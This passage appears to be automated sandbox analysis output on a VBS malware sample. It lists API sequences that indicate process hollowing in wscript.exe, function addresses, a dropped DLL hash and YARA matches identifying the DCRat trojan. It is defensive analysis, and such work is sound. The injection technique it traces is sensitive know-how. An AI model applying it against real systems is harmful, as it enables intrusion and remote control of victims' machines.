        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_2_05660054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_05660054
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_2_05660000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_05660000
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_2_05E30054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_05E30054
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_2_05E30000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_05E30000
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_2_05E3003C CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_05E3003C
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_2_05EC0054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_05EC0054
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_2_05EC0000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_05EC0000
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_2_06230054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_06230054
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_2_06230000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_06230000
        Source: C:\Windows\winhlp32.exeCode function: 17_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,17_2_004167B4
        Source: C:\Windows\winhlp32.exeCode function: 19_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,19_2_004167B4
        Source: C:\Windows\winhlp32.exeCode function: 21_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,21_2_004167B4
        Source: C:\Windows\winhlp32.exeCode function: 23_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,23_2_004167B4
        Source: C:\Windows\winhlp32.exeCode function: 27_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,27_2_004167B4
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9F5D2_3_051A9F5D
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9FD12_3_051A9FD1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02D665D04_2_02D665D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02D66EA04_2_02D66EA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02D662884_2_02D66288
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02D6B5904_2_02D6B590
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0043E0CC17_2_0043E0CC
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041F0FA17_2_0041F0FA
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0045415917_2_00454159
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0043816817_2_00438168
        Source: C:\Windows\winhlp32.exeCode function: 17_2_004461F017_2_004461F0
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0043E2FB17_2_0043E2FB
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0045332B17_2_0045332B
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0042739D17_2_0042739D
        Source: C:\Windows\winhlp32.exeCode function: 17_2_004374E617_2_004374E6
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0043E55817_2_0043E558
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0043877017_2_00438770
        Source: C:\Windows\winhlp32.exeCode function: 17_2_004378FE17_2_004378FE
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0043394617_2_00433946
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0044D9C917_2_0044D9C9
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00427A4617_2_00427A46
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041DB6217_2_0041DB62
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00427BAF17_2_00427BAF
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00437D3317_2_00437D33
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00435E5E17_2_00435E5E
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00426E0E17_2_00426E0E
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0043DE9D17_2_0043DE9D
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00413FCA17_2_00413FCA
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00436FEA17_2_00436FEA
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0043E0CC19_2_0043E0CC
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0041F0FA19_2_0041F0FA
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0045415919_2_00454159
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0043816819_2_00438168
        Source: C:\Windows\winhlp32.exeCode function: 19_2_004461F019_2_004461F0
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0043E2FB19_2_0043E2FB
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0045332B19_2_0045332B
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0042739D19_2_0042739D
        Source: C:\Windows\winhlp32.exeCode function: 19_2_004374E619_2_004374E6
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0043E55819_2_0043E558
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0043877019_2_00438770
        Source: C:\Windows\winhlp32.exeCode function: 19_2_004378FE19_2_004378FE
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0043394619_2_00433946
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0044D9C919_2_0044D9C9
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00427A4619_2_00427A46
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0041DB6219_2_0041DB62
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00427BAF19_2_00427BAF
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00437D3319_2_00437D33
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00435E5E19_2_00435E5E
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00426E0E19_2_00426E0E
        Source: C:\Windows\winhlp32.exeCode function: 19_2_0043DE9D19_2_0043DE9D
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00413FCA19_2_00413FCA
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00436FEA19_2_00436FEA
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0043E0CC21_2_0043E0CC
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0041F0FA21_2_0041F0FA
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0045415921_2_00454159
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0043816821_2_00438168
        Source: C:\Windows\winhlp32.exeCode function: 21_2_004461F021_2_004461F0
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0043E2FB21_2_0043E2FB
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0045332B21_2_0045332B
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0042739D21_2_0042739D
        Source: C:\Windows\winhlp32.exeCode function: 21_2_004374E621_2_004374E6
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0043E55821_2_0043E558
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0043877021_2_00438770
        Source: C:\Windows\winhlp32.exeCode function: 21_2_004378FE21_2_004378FE
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0043394621_2_00433946
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0044D9C921_2_0044D9C9
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00427A4621_2_00427A46
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0041DB6221_2_0041DB62
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00427BAF21_2_00427BAF
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00437D3321_2_00437D33
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00435E5E21_2_00435E5E
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00426E0E21_2_00426E0E
        Source: C:\Windows\winhlp32.exeCode function: 21_2_0043DE9D21_2_0043DE9D
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00413FCA21_2_00413FCA
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00436FEA21_2_00436FEA
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0043E0CC23_2_0043E0CC
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0041F0FA23_2_0041F0FA
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0045415923_2_00454159
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0043816823_2_00438168
        Source: C:\Windows\winhlp32.exeCode function: 23_2_004461F023_2_004461F0
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0043E2FB23_2_0043E2FB
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0045332B23_2_0045332B
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0042739D23_2_0042739D
        Source: C:\Windows\winhlp32.exeCode function: 23_2_004374E623_2_004374E6
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0043E55823_2_0043E558
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0043877023_2_00438770
        Source: C:\Windows\winhlp32.exeCode function: 23_2_004378FE23_2_004378FE
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0043394623_2_00433946
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0044D9C923_2_0044D9C9
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00427A4623_2_00427A46
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0041DB6223_2_0041DB62
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00427BAF23_2_00427BAF
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00437D3323_2_00437D33
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00435E5E23_2_00435E5E
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00426E0E23_2_00426E0E
        Source: C:\Windows\winhlp32.exeCode function: 23_2_0043DE9D23_2_0043DE9D
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00413FCA23_2_00413FCA
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00436FEA23_2_00436FEA
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0043E0CC27_2_0043E0CC
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0041F0FA27_2_0041F0FA
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0045415927_2_00454159
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0043816827_2_00438168
        Source: C:\Windows\winhlp32.exeCode function: 27_2_004461F027_2_004461F0
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0043E2FB27_2_0043E2FB
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0045332B27_2_0045332B
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0042739D27_2_0042739D
        Source: C:\Windows\winhlp32.exeCode function: 27_2_004374E627_2_004374E6
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0043E55827_2_0043E558
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0043877027_2_00438770
        Source: C:\Windows\winhlp32.exeCode function: 27_2_004378FE27_2_004378FE
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0043394627_2_00433946
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0044D9C927_2_0044D9C9
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00427A4627_2_00427A46
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0041DB6227_2_0041DB62
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00427BAF27_2_00427BAF
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00437D3327_2_00437D33
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00435E5E27_2_00435E5E
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00426E0E27_2_00426E0E
        Source: C:\Windows\winhlp32.exeCode function: 27_2_0043DE9D27_2_0043DE9D
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00413FCA27_2_00413FCA
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00436FEA27_2_00436FEA
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\dynwrapx.dll 4EF3A6703ABC6B2B8E2CAC3031C1E5B86FE8B377FDE92737349EE52BD2604379
        Source: C:\Windows\winhlp32.exeCode function: String function: 00402213 appears 95 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 0040159A appears 35 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 0040159F appears 35 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 0043A34C appears 40 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00402218 appears 40 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00407200 appears 55 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 004052FD appears 80 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00403093 appears 40 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00434E10 appears 270 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 004576B0 appears 32 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 0040417E appears 115 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 0040482D appears 35 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00402093 appears 250 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00434770 appears 205 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 0040915B appears 40 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00409052 appears 40 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00401F86 appears 55 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00401E65 appears 170 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 0040274D appears 45 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00401FAB appears 95 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 0043C26E appears 70 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00411F67 appears 80 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 0040C1D8 appears 45 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 0043C0CF appears 65 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 004020DF appears 100 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 00457A28 appears 85 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 004484CA appears 90 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 004458D0 appears 140 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 004046F7 appears 85 times
        Source: C:\Windows\winhlp32.exeCode function: String function: 0040223D appears 42 times
        Source: lmg1_Mlakaifa443456.vbsInitial sample: Strings found which are bigger than 50
        Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
